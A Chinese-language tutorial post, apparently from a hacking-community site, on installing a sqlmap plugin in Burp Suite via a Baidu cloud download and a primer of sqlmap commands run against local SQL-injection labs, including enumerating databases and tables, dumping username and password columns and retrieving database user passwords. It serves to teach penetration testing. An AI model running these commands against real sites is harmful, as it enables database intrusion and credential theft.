使用burp联合sqlmap进行自动化SQL注入测试
发布时间:2022-04-29 10:05:23 1305
相关标签: # 漏洞# 工具# 扫描
使用burp联合sqlmap进行自动化SQL注入测试
0x01 burp配置sqlmap插件
1、下载sqlmap.jar扩展包
链接:https://pan.baidu.com/s/1NI-gvvlaydCAKk3Uo0GpXA
提取码:p0h9
2、添加sqlmap.jar扩展包
在burp中的extender–>add–>select file.
添加成功后状态栏会出现 sqlmap
的选项
0x02 sqlmap插件使用
1、将sqlmap添加到环境变量中
然后sqlmap就可以在任意路径的命令行中使用了
2、 开启一个sql注入的靶场
然后开启burp抓包
点击 Extensions ==> sqlmap ==> send to sqlmap
成功完成sqlmap注入
3、SQLMap入门
1.判断是否存在注入
sqlmap.py -u http://127.0.0.1/sql1/Less-1/?id=1
当注入点后面的参数大于等于两个时,需要加双引号。
sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1&uid=2"
2.判断文本中的请求是否存在注入
sqlmap.py -r desktop/1.txt
-r一般在存在cookie注入时使用。
3.查询当前用户下的所有数据库
sqlmap.py -u http://127.0.0.1/sql1/Less-1/?id=1 --dbs
4.获取数据库中的表名
sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" -D dkeye --tables
5.获取表中的字段名
sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" -D dkeye -T user_info --colums
6. 获取字段内容
sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" -D dkeye -T user_info -C username,password --dump
7.获取数据库的所有用户
sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" --users
8.获取数据库用户的密码
sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" --passwords
9.获取当前网站数据库的名称
sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" --current-db
10.获取当前网站数据库的用户名称
sqlmap.py -u "http://127.0.0.1/sql/union.php?id=1" --current-user
获取更多网络安全信息:
+Q Q群:863658976
V X公众号: 哈客部落
哈客社区:hake.cc
特别声明:以上内容(图片及文字)均为互联网收集或者用户上传发布,本站仅提供信息存储服务!如有侵权或有涉及法律问题请联系我们。
举报